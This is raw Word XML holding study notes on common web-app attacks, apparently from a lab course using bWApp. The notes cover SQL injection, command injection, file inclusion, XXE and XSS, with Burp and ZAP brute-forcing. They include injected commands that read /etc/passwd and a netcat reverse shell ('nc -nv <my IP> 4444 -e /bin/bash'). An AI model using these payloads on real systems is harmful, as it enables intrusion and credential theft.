        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="005570C1" w:rsidRDefault="005570C1" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="005570C1" w:rsidRDefault="005570C1" w:rsidP="00263D34">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>**Common web-app threats</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005570C1" w:rsidRPr="005570C1" w:rsidRDefault="005570C1" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>A way for a browser to interact with a back-end server.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00993316" w:rsidRPr="00C77BCC" w:rsidRDefault="00C77BCC" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C77BCC">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Injection Attack:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="00C77BCC" w:rsidP="00263D34">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>SQL injection</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C77BCC" w:rsidRDefault="00C77BCC" w:rsidP="00263D34">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Command injection</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C77BCC" w:rsidRDefault="00C77BCC" w:rsidP="00263D34">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>http injection</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C77BCC" w:rsidRDefault="00C77BCC" w:rsidP="00263D34">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>raw injection</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00304B73" w:rsidRDefault="00304B73" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00C77BCC" w:rsidRPr="00C77BCC" w:rsidRDefault="00C77BCC" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C77BCC">
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>SQL Injection</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C77BCC" w:rsidRDefault="00C77BCC" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:i/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Login: </w:t>
      </w:r>
      <w:r w:rsidRPr="00C77BCC">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">blah’ or 1=1 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>--</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C77BCC" w:rsidRDefault="00C77BCC" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Password: blah</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00304B73" w:rsidRDefault="00304B73" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00C77BCC" w:rsidRDefault="00C77BCC" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Command Injection</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C77BCC" w:rsidRDefault="00DC72B9" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:i/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Enter an IP to PING: </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00DC72B9">
        <w:t>127.0.0.1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve"> ;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve"> cat /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>passwd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DC72B9" w:rsidRDefault="00DC72B9" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:i/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Enter an IP to PING: 127.0.0.1 </w:t>
      </w:r>
      <w:r w:rsidRPr="00DC72B9">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">&amp;&amp; which </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00DC72B9">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>nc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w:rsidR="00DC72B9" w:rsidRDefault="00DC72B9" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:i/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">Start </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>a</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>nc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve"> listener on my system, then:</w:t>
      </w:r>
      <w:r w:rsidR="000069D2">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="000069D2">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>nc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="000069D2">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve"> –</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="000069D2">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>nvlp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="000069D2">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve"> 4444</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DC72B9" w:rsidRDefault="00DC72B9" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:i/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Enter an IP to PING: </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t xml:space="preserve">127.0.0.1 </w:t>
      </w:r>
      <w:r w:rsidRPr="00DC72B9">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00DC72B9">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DC72B9">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>nc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DC72B9">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve"> –</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DC72B9">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>nv</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DC72B9">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;my IP&gt; 4444 –e /bin/bash</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DC72B9" w:rsidRDefault="00DC72B9" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:i/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00DC72B9" w:rsidRDefault="00DC72B9" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>http</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve"> injection</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DC72B9" w:rsidRDefault="000069D2" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="000069D2">
        <w:t xml:space="preserve">Name: </w:t>
      </w:r>
      <w:r w:rsidRPr="000069D2">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>&lt;b&gt;</w:t>
      </w:r>
      <w:r>
        <w:t>David</w:t>
      </w:r>
      <w:r w:rsidRPr="000069D2">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>&lt;b&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000069D2" w:rsidRPr="000069D2" w:rsidRDefault="000069D2" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Last name: </w:t>
      </w:r>
      <w:r w:rsidRPr="000069D2">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>&lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000069D2">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000069D2">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
      <w:r>
        <w:t>Richards</w:t>
      </w:r>
      <w:r w:rsidRPr="000069D2">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>&lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000069D2">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000069D2">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DC72B9" w:rsidRDefault="00DC72B9" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="000069D2" w:rsidRDefault="000069D2" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Code Injection</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000069D2" w:rsidRDefault="000069D2" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">See what the site does. Check </w:t>
      </w:r>
      <w:r w:rsidR="000748A0">
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Put raw code in the </w:t>
      </w:r>
      <w:r w:rsidR="000748A0">
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> to see what happens. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000069D2" w:rsidRDefault="000069D2" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Start a listener and enter a code in the URL. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000069D2" w:rsidRDefault="000069D2" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="000069D2" w:rsidRDefault="00304B73" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>File Inclusion</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00304B73" w:rsidRDefault="00304B73" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Web server reaches out to include files rather than have it stored locally. If you see </w:t>
      </w:r>
      <w:r w:rsidRPr="00304B73">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve">“file=” </w:t>
      </w:r>
      <w:r>
        <w:t>then the web app is reaching out to include another file. Can you change the name of the file?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FD1B50" w:rsidRDefault="00FD1B50" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00304B73" w:rsidRPr="00FD1B50" w:rsidRDefault="00304B73" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FD1B50">
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>RFI &amp; LFI – remote or local</w:t>
      </w:r>
      <w:r w:rsidR="00FD1B50">
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve"> file inclusion</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00304B73" w:rsidRDefault="00A9175E" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="003A05B8">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>RFI</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> – </w:t>
      </w:r>
      <w:r w:rsidR="00F65149">
        <w:t xml:space="preserve">Set up apache simple http server on port 8888. Make a simple python script to enable a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00F65149">
        <w:t>netcat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00F65149">
        <w:t xml:space="preserve">. Set a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00F65149">
        <w:t>netcat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00F65149">
        <w:t xml:space="preserve"> listener on my host then </w:t>
      </w:r>
      <w:r>
        <w:t>change where the file is looking and put our own code in. “language=</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>French.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidR="00F65149">
        <w:t xml:space="preserve"> change to “</w:t>
      </w:r>
      <w:r>
        <w:t>language=</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>http:</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>//&lt;my ip&gt;/8888/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>netkat.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00F65149">
        <w:t xml:space="preserve">” this executes the script and will start a remote-shell. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F65149" w:rsidRDefault="00F65149" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="003A05B8">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>LFI</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> – this can be done locally. </w:t>
      </w:r>
      <w:r w:rsidRPr="00F65149">
        <w:t>“</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F65149">
        <w:t>language=</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F65149">
        <w:t>French.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F65149">
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> to “language=/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>passwd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>”. Getting reverse-shell is harder his way. Need to locate a directory that is writeable. May have to combine with a directory traversal technique too. “</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>language</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>=</w:t>
      </w:r>
      <w:r w:rsidR="00C155B5">
        <w:t>../../../../../../../../../</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00C155B5">
        <w:t>etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00C155B5">
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00C155B5">
        <w:t>passwd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00C155B5">
        <w:t>”</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00304B73" w:rsidRDefault="00C155B5" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>page</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve">=../../../../../proc/self/environ” This is a file that reads information out of the GET request. The HTTP_USER_AGENT field of the GET request can be manipulated. Start </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>a</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>nc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> listener. </w:t>
      </w:r>
      <w:r w:rsidR="003A05B8">
        <w:t xml:space="preserve">Intercept on Burp then use the repeater to enter </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="003A05B8">
        <w:t>php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="003A05B8">
        <w:t xml:space="preserve"> code which will start </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="003A05B8">
        <w:t>nc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="003A05B8">
        <w:t xml:space="preserve"> and connect the listener on port 4444. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F65149" w:rsidRDefault="00F65149" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="000F1C6B" w:rsidRDefault="007E4B72" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007E4B72">
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Authentication mechanisms</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007E4B72" w:rsidRDefault="007E4B72" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="007E4B72">
        <w:lastRenderedPageBreak/>
        <w:t>OWASP ZAP</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> runs faster for this specific hack. Weak passwords – </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>bWApp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>. Brute force using Burp or ZAP</w:t>
      </w:r>
      <w:r w:rsidR="00004E2C">
        <w:t>. Use the intruder tab in Burp – set payloads and then start attack. Community edition is throttled.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00004E2C" w:rsidRPr="007E4B72" w:rsidRDefault="00004E2C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00004E2C">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>ZAP</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> – for an attack set persist. Then simply enter the URL and away you go. Click attack and it will start analysis of the site. Intercept the web traffic. View it I zap. Strat the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>fuzzer</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">, add the payloads and attack. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003846AB" w:rsidRDefault="003846AB" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="003A05B8" w:rsidRDefault="008673D5" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Keep an eye out for sessions being still valid after logging out when using multiple tabs in a </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>Browser.</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008673D5" w:rsidRDefault="008673D5" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="003846AB" w:rsidRDefault="003846AB" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Weak to no encryption. Base64 Encoding (secret). Burp find the “secret=” in the cookie. Then use the decoder in Burp to take html off, then decode from base64. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00175982" w:rsidRDefault="00175982" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="003846AB" w:rsidRDefault="003846AB" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00175982">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>XXE</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- If there is an xml parser on the web app. </w:t>
      </w:r>
      <w:r w:rsidR="00B9079D">
        <w:t>Feed</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> it </w:t>
      </w:r>
      <w:r w:rsidR="00175982">
        <w:t xml:space="preserve">some </w:t>
      </w:r>
      <w:r>
        <w:t>code and then it is possi</w:t>
      </w:r>
      <w:r w:rsidR="00175982">
        <w:t>ble to input your own xml code to retrieve contents of “/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00175982">
        <w:t>etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00175982">
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00175982">
        <w:t>passwd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00175982">
        <w:t>”.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00175982" w:rsidRDefault="00175982" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00175982" w:rsidRDefault="003372B9" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="003372B9">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>XSS</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> – Cross Site Scripting</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A87C5A" w:rsidRDefault="003372B9" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00EE5BC6">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Reflected</w:t>
      </w:r>
      <w:r w:rsidR="00EE5BC6">
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Web app asks you for some information. Then it uses that info somewhere else on the site. “Hello, David”. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A87C5A" w:rsidRDefault="00A87C5A" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>What is your name</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>?:</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A87C5A">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>&lt;script&gt;alert(“XSS”)&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EE5BC6" w:rsidRDefault="003372B9" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00EE5BC6">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Stored</w:t>
      </w:r>
      <w:r w:rsidR="00EE5BC6">
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00A87C5A">
        <w:t xml:space="preserve">Writing in a comment box, sign a guestbook. </w:t>
      </w:r>
      <w:r w:rsidR="00EE5BC6">
        <w:t>Stores the code, so whenever you visit the page the script will run again.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EE5BC6" w:rsidRDefault="00EE5BC6" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="003372B9" w:rsidRDefault="00EE5BC6" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
